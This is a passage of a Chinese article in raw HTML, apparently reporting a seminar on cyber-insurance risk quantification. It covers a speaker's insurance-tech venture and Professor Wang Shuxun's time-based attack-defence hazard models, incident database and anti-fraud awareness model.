14px;">唐涵喆先生有20多年的保险从业经验，2年前踏入安全圈，他讲述二次创业做网络安全保险科技公司的初衷，阐明网安保险的风险量化与网安防护的量化之间的区别，他认为保险业务的关键在于保险定价的量化模型,需要构建一座连接保险业和网安行业的桥梁，并隆重介绍王树勋教授来提供创新解决方案。<o:p></o:p></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;"><img class="rich_pages wxw-img" data-imgfileid="100000297" data-ratio="0.6483001172332943" data-type="png" data-w="853" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=dc4268da&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxhaGk6ypSZEM7pC1orRdlicOOo7P8JxnrSTt6nUSAmlqC823uwcToibC3svyZukGpXibmKSzlov4ZJA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><o:p></o:p></span></p><p><span style="font-size: 18px;"><strong><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);">（一）保险业务视角下的网安</span></strong></span><span style="font-size: 14px;"><strong><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);"><o:p></o:p></span></strong></span></p><p><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">唐先生一直在跟安全圈的朋友们说，网安保险的风险量化，和安全防护的量化是两个东西。</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">安全量化是保险量化的其中一个重要组成部分，但是不能代替保险的风险量化</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">。而且，安全事件的发生，基本不是自身安全防护这一个单一因素决定的，我们比保险圈的大多数人更了解安全，要用保险行业更能理解的逻辑去解释安全，给大家带来一些新的思路。 <o:p></o:p></span></span></p><p><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">网安保险起步后，市场有需求有机会，而且在建模方面和国外差不多是在同一起跑线。赛保保是网络安全保险科技公司，要构建保险行业和安全行业的桥梁，主要做语言和数字的翻译，因为保险想要的量化结果和安全行业测评结果不一样，</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">保险行业习惯用保险的语言、精算的方法，做概率、百分比测算</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">。赛保保的核心不是网络安全服务，主要是满足保险侧的应用需求，服务保险行业需要直观看到的一些内容。</span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;"><o:p></o:p></span></span></p><p><span style="font-size: 18px;"><strong><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);">（二）需要保险定价量化模型来缝合保险和网安</span></strong></span><span style="font-size: 14px;"><strong><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);"><o:p></o:p></span></strong></span></p><p><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">唐涵喆先生认为我们在国际保险界的影响力和话语权有限，典型的表现就是</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: red;">缺乏高认知度的保险定价量化模型</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">。但是，网络安全保险的风险量化模型，我们和国外先进同行是在同一起跑线。</span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;"><o:p></o:p></span></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">网络安全保险风险量化与传统网络安全防护量化之间有差异，具体差别在哪里？如何呈现给网络安全界？<o:p></o:p></span></p><p><span style="font-size: 18px;"><strong><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);">（三）站在巨人的肩膀上</span></strong></span><span style="font-size: 14px;"><strong><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);"><o:p></o:p></span></strong></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">唐先生认为需要构建一座连接保险业和网安行业的桥梁，并隆重介绍王树勋教授，来讲述网络安全风险量化的创新解决方案。<o:p></o:p></span></p><p><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">王树勋，长期在学术界做保险的量化模型研究，2015-2019在南洋理工承接了</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">新加坡金管局网络安全保险风险量化研究项目</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">。该项目由政府部门支持，知名保险公司参与，是跨政产学研、融合保险业务和网络安全技术的项目。王教授现为南方科技大学金融系主任。</span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;"><o:p></o:p></span></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;"><img class="rich_pages wxw-img" data-imgfileid="100000298" data-ratio="0.6517119244391971" data-type="png" data-w="847" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=73a13f95&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxhaGk6ypSZEM7pC1orRdlictvdjdxiaeOiaziceLM3zvMY3uTWGePkhNaFUFZMle3vUzR4Q0XDib5aicQQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><o:p></o:p></span></p><p><span style="font-size: 20px;"><strong><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(30, 78, 121);">二、创新性网安保险风险量化模型</span></strong></span><span style="font-size: 14px;"><strong><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(30, 78, 121);"> </span></strong><strong><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(30, 78, 121);"><o:p></o:p></span></strong></span></p><table cellspacing="0" cellpadding="0" title="" summary=""><tbody><tr style="mso-yfti-irow:0;mso-yfti-firstrow:yes;mso-yfti-lastrow:yes;"><td width="550" valign="top" style="border-width: 1pt;border-style: solid;border-color: rgb(163, 163, 163);padding: 4pt;word-break: break-all;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">王树勋教授的创新方案，将保险视角与网安技术视角有机融合,努力量化传统被视为难以量化的网安风险,具有开创性意义。核心要素包括:<o:p></o:p></span></p><ol style="margin-top:0cm;" start="1" type="1" class="list-paddingleft-1"><li style="color: black;text-align: left;vertical-align: middle;font-size: 14px;"><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;">时间积分模型。核心是将时间因素纳入网络攻防博弈的风险量化中,提出&#34;进攻-防守瞬时和累积风险率模型&#34;,用数学公式刻画风险随时间的动态累积过程。<o:p></o:p></span></p></li><li style="color: black;text-align: left;vertical-align: middle;font-size: 14px;"><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;">事件分类与数据支撑。对网络安全事件和业务类型进行分门别类的管理,并建立专门的数据库为模型提供数据支持,使风险量化更精准。<o:p></o:p></span></p></li><li style="color: black;text-align: left;vertical-align: middle;font-size: 14px;"><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;">意识差异反诈骗模型。创新性地将&#34;攻击者意识&#34;和&#34;防守者意识&#34;的差异纳入模型,量化&#34;隐私集&#34;和&#34;危险集&#34;的不对称性,用于量化如诈骗等未知风险。<o:p></o:p></span></p></li><li style="color: black;text-align: left;vertical-align: middle;font-size: 14px;"><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;">双因子风险模型。融合技术和非技术两个因素,一方面评估系统防护能力,另一方面考虑人员培训、流程管控等非技术层面的风险管理。<o:p></o:p></span></p></li><li style="color: black;text-align: left;vertical-align: middle;font-size: 14px;"><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;">案例驱动理论创新。模型建立过程中,大量引用了典型的网络攻击案例,如情感诈骗案、Coincheck黑客入侵等,帮助理论创新和理论验证。<o:p></o:p></span></p></li></ol></td></tr></tbody></table><section style="margin-bottom: 8px;"><span style="font-size: 18px;"><strong><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);">（一）时间动态风险建模</span></strong></span><span style="font-size: 14px;"><strong><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);"><o:p></o:p></span></strong></span></section><section style="margin-bottom: 8px;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">- 时间是网络攻防风险累积的关键因素<o:p></o:p></span></section><section style="margin-bottom: 8px;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">- 提出&#34;进攻-防守瞬时和风险累积率模型&#34;<o:p></o:p></span></section><section style="margin-bottom: 8px;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">- 用数学公式量化风险随时间的动态变化<o:p></o:p></span></section><section style="margin-bottom: 8px;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">- 案例:密码更新、短信验证码影响风险率变化<o:p></o:p></span></section><p><strong style="font-size: 16px;letter-spacing: 0.034em;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);">1</span></strong><strong style="font-size: 16px;letter-spacing: 0.034em;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);">．网安是一个大产业</span></strong></p><p><span style="font-size: 14px;"><strong><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);"><o:p></o:p></span></strong></span><span style="color: black;font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;letter-spacing: 0.034em;">今天我们要探讨的是有技术，怎么找到应用；有保险，怎么起到更好的作用。</span></p><p><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">王教授做新加坡金管局网络安全保险风险量化研究项目期间，于2018年曾去旧金山参加过网络安全会议，为期一周，四万三千人参会，门票大几千美元，说明</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">网安是一个非常大的产业</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">。  <o:p></o:p></span></span></p><p><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">网络安全、数据安全，是战场上攻击、防守博弈。两个案例，缅北有诈骗产业园区，诈骗已经是产业；香港sora视频深度伪造技术，伪装CFO诈骗了2亿。在数字、智能时代，要实现网安，不需要产业么？</span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;"><img class="rich_pages wxw-img" data-imgfileid="100000299" data-ratio="0.6859504132231405" data-type="png" data-w="847" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=8d76e0d0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxhaGk6ypSZEM7pC1orRdlicLJ5hic0FoWicOSXLaGLPQRB1gwbDRKburTm187IM524byxG0sjq6WlQA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p><strong style="font-size: 16px;letter-spacing: 0.034em;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);">2. </span></strong><strong style="font-size: 16px;letter-spacing: 0.034em;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);">模型就是要创造融合各方视角的奇迹</span></strong></p><p><span style="font-size: 14px;"><strong><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);"><o:p></o:p></span></strong></span><span style="font-size: 14px;letter-spacing: 0.034em;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">保险业务和网安技术人员的视角非常不一样，这是个普遍现象，国外也是这样，今天，</span><span style="font-size: 14px;letter-spacing: 0.034em;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">各种角色坐在一起就是一个奇迹</span><span style="font-size: 14px;letter-spacing: 0.034em;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">。</span></p><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="color: black;text-align: left;vertical-align: middle;font-size: 14px;"><p><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;">网络安全技术的角度，是从左到右，从威胁、漏洞、看危害。<o:p></o:p></span></p></li><li style="color: black;text-align: left;vertical-align: middle;font-size: 14px;"><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;">保险业务的角度，是从右边开始，因为是和钱打交道。到底会有什么损失，有什么样的资产需要保护。</span></p></li></ul><p><img class="rich_pages wxw-img" data-imgfileid="100000300" data-ratio="0.6920374707259953" data-type="png" data-w="854" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=217a3cc8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxhaGk6ypSZEM7pC1orRdliclDv9YIMAHT0aNGq4d6abuYxOCXwKu16joNL2waicZvicO4aGZ2y2ibsOA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;"><o:p></o:p></span></p><p><span style="font-size: 16px;"><strong style="font-size: 14px;letter-spacing: 0.034em;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);">3 </span></strong><strong style="font-size: 14px;letter-spacing: 0.034em;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);">如何量化未知的未知？</span></strong></span></p><p><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">项目开始时，就有银行的CIO问，请你帮我们量化一下unknown unknown。</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">未知的未知如何量化？</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">是什么意思？一个大机构的CIO，一旦出大问题，他是需要负责、背锅的，他最担心的</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: red;">应该知道的不知道</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">，外面谁能告诉他？网络世界，另一端的黑客整天想着怎么攻击，怎么诈骗，我们要怎样做量化？</span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;"><o:p></o:p></span></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;"><img class="rich_pages wxw-img" data-imgfileid="100000301" data-ratio="0.6380510440835266" data-type="png" data-w="862" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=23d4b842&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxhaGk6ypSZEM7pC1orRdliculIicr0GkTN4c4dLjdKo7Vib49ILzIcZ7rn3NKKC8XtibXyvLEVXkqgMQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><o:p></o:p></span></p><p><span style="font-size: 16px;"><strong style="font-size: 14px;letter-spacing: 0.034em;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);">4</span></strong><strong style="font-size: 14px;letter-spacing: 0.034em;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);">． 如何让预算更有效地起到作用</span></strong></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">保险和钱打交道，第一个因素是预算。预算是否到位，英国公共安全NHS医疗部门，明明知道会被网络安全攻击，也知道预算不够，结果真的出事了，只能被攻击。<o:p></o:p></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">第二个因素是预算如何起到保护作用。评估需要帮助预算如何更有效地起到保护作用，是否通过保险的方式，保险花的钱不多，但是达到效果很好？<o:p></o:p></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;"><img class="rich_pages wxw-img" data-imgfileid="100000302" data-ratio="0.6804245283018868" data-type="png" data-w="848" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=71ad172d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxhaGk6ypSZEM7pC1orRdlic9Jd1rxWrMxwt4LeLCovauJM74oyiaE9nUaL3MG9VY1JLY6sHXJ0HibKQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><o:p></o:p></span></p><p><span style="font-size: 16px;"><strong style="font-size: 14px;letter-spacing: 0.034em;"><span lang="EN-US" style="font-size: 16px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);">5</span></strong><strong style="font-size: 14px;letter-spacing: 0.034em;"><span style="font-size: 16px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);">．时间是网络安全的本质</span></strong></span></p><p><span style="font-size: 16px;"><strong><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);">6</span></strong><strong><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);">．网络攻击的瞬时和累积危险率模型</span></strong></span><span style="font-size: 14px;"><strong><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);"><o:p></o:p></span></strong></span></p><p><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">王树勋教授是数学出身，也是精算师，
要做量化模型，应该从什么角度？</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">时间是关键</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">！</span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;"><o:p></o:p></span></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">进攻和防守的博弈。系统被攻击突破，钱被转走，都是一瞬间的事情，所以风险的积累是个时间因素。防守的积累，投入的积累，要做量化，说到底，是进攻-防守的相对优势怎么表示出来。<o:p></o:p></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">瞬时被攻破的风险，有个量化手段或公式，是关于时间的积分，随着时间积累起来。<o:p></o:p></span></p><p><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">时间是网络安全的本质，因此提出了</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">网络攻击的瞬时和累积累风险率模型</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">。</span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;"><o:p></o:p></span></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;"><img class="rich_pages wxw-img" data-imgfileid="100000303" data-ratio="0.660377358490566" data-type="png" data-w="848" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=b3b5d0f7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxhaGk6ypSZEM7pC1orRdlicflteppMmM1PWMu18dlWtH43QcBlMtUlp44nQBVmqc2HxNTkIOibKSaw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><o:p></o:p></span></p><p><span style="font-size: 16px;"><strong style="font-size: 14px;letter-spacing: 0.034em;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);">7</span></strong><strong style="font-size: 14px;letter-spacing: 0.034em;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);">．模型的直观示例</span></strong></span></p><p><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">以我们很早（2015-2016年）做过的一个模型为例，密码长期不更新，累积风险率一直上升。每个季度都定期密码重置，提升了安全水平。现在要求短信验证码，</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">瞬时危险率</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">也会降低，安全程度上升。 <o:p></o:p></span></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;"><img class="rich_pages wxw-img" data-imgfileid="100000304" data-ratio="0.6494117647058824" data-type="png" data-w="850" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=d621af18&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxhaGk6ypSZEM7pC1orRdlicaqNTflkrQ3rZPFBAYgofzprW4lEYjAvKDX4qPib36u1ac8Hu3ICXXpw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><o:p></o:p></span></p><p style="margin-bottom: 8px;"><span style="font-size: 18px;"><strong><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);">（二）事件分类与专业数据库</span></strong></span><span style="font-size: 14px;"><strong><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);"><o:p></o:p></span></strong></span></p><p style="margin-bottom: 8px;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">- 对复杂多样的网安事件和业务类型分类管理 <o:p></o:p></span></p><p style="margin-bottom: 8px;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">- 建立专门的数据库为模型提供数据支撑<o:p></o:p></span></p><p style="margin-bottom: 8px;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">- 数据支持模型更精准:如营业额与理赔相关<o:p></o:p></span></p><p><span style="font-size: 16px;"><strong style="font-size: 14px;text-align: left;text-indent: 0em;letter-spacing: 0.034em;"><span lang="EN-US" style="font-size: 16px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);">1.<span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-weight: normal;font-stretch: normal;font-family: &#34;Times New Roman&#34;;">    </span></span></strong><strong style="font-size: 14px;text-align: left;text-indent: 0em;letter-spacing: 0.034em;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);">需要分事件类别进行建模</span></strong></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">网络安全、数据安全非常宽广，有大企业、小企业、个人，而且攻击类别也很多。我们有个建模实验室，为了量化，就需要分类，就是先给不同的风险分类，需要一个个类别搞清楚。<o:p></o:p></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;"><img class="rich_pages wxw-img" data-imgfileid="100000305" data-ratio="0.6556603773584906" data-type="png" data-w="848" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=e8277383&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxhaGk6ypSZEM7pC1orRdlics3547Zljgg3LluLFpaOtGXibic7n22OyambFCvT4dKxSkDxCt14YNPDw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><o:p></o:p></span></p><p><span style="font-size: 16px;"><strong style="font-size: 14px;text-align: left;text-indent: 0em;letter-spacing: 0.034em;"><span lang="EN-US" style="font-size: 16px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);">2.<span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-weight: normal;font-stretch: normal;font-family: &#34;Times New Roman&#34;;">   </span></span></strong><strong style="font-size: 14px;text-align: left;text-indent: 0em;letter-spacing: 0.034em;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);">专有数据库为模型提供了数据支撑</span></strong></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">在新加坡期间，还建立了专有数据库。<o:p></o:p></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;"><img class="rich_pages wxw-img" data-imgfileid="100000306" data-ratio="0.6440281030444965" data-type="png" data-w="854" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=42850d23&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxhaGk6ypSZEM7pC1orRdlic28AY2P9GgKSVKhVibia8lrjs0ZbLo8259YgpVy0ibrcxCUcw6RUYO1G5w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><o:p></o:p></span></p><p><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">最大损失是欺诈性转账和营业中断费用，这些都是保险可以起到作用的。<o:p></o:p></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;"><img class="rich_pages wxw-img" data-imgfileid="100000307" data-ratio="0.660377358490566" data-type="png" data-w="848" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=5762d4ff&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxhaGk6ypSZEM7pC1orRdlicyEFzlRNNNI4o4LSvgia8ibtcrpPgkEb92GeagPcdNoPwwZtvmaV6IR1Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><o:p></o:p></span></p><p><span style="font-size: 16px;"><strong style="font-size: 14px;text-align: left;text-indent: 0em;letter-spacing: 0.034em;"><span lang="EN-US" style="font-size: 16px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);">3.<span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-weight: normal;font-stretch: normal;font-family: &#34;Times New Roman&#34;;">   </span></span></strong><strong style="font-size: 14px;text-align: left;text-indent: 0em;letter-spacing: 0.034em;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);">模型的直观示例</span></strong></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">我们梳理数据，发现保险承保损失（理赔数据）和营业额密切相关；定价模型，即保费怎么合理，应该和营业额也密切相关，第一个变量就是营业额。<o:p></o:p></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;"><img class="rich_pages wxw-img" data-imgfileid="100000308" data-ratio="0.6770708283313326" data-type="png" data-w="833" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=ed438c7b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxhaGk6ypSZEM7pC1orRdlicYWpTgoU8ibxXkKJaBUn6hDEAYKa0ia0mdvPFiaicnBechnRUXnhMrmqqCQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><o:p></o:p></span></p><section style="margin-bottom: 8px;"><span style="font-size: 18px;"><strong><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);">（三）意识差异反诈骗量化</span></strong></span><span style="font-size: 14px;"><strong><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);"><o:p></o:p></span></strong></span></section><section style="margin-bottom: 8px;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">- 创新将&#34;攻击者意识&#34;和&#34;防守者意识&#34;差异纳入<o:p></o:p></span></section><section style="margin-bottom: 8px;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">- 量化&#34;隐私集&#34;和&#34;危险集&#34;的不对称性 <o:p></o:p></span></section><section style="margin-bottom: 8px;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">- 用于量化诈骗等&#34;未知的未知&#34;风险<o:p></o:p></span></section><section style="margin-bottom: 8px;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">- 案例:情感诈骗过程中的意识差异影响<o:p></o:p></span></section><p><strong style="font-size: 16px;letter-spacing: 0.034em;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);">1</span></strong><strong style="font-size: 16px;letter-spacing: 0.034em;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);">．诈骗和反诈就是意识的不平衡倾斜</span></strong></p><p><span style="color: black;font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;letter-spacing: 0.034em;">反诈方面，我们在概念上、学术上有突破。</span><br/></p><p><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: 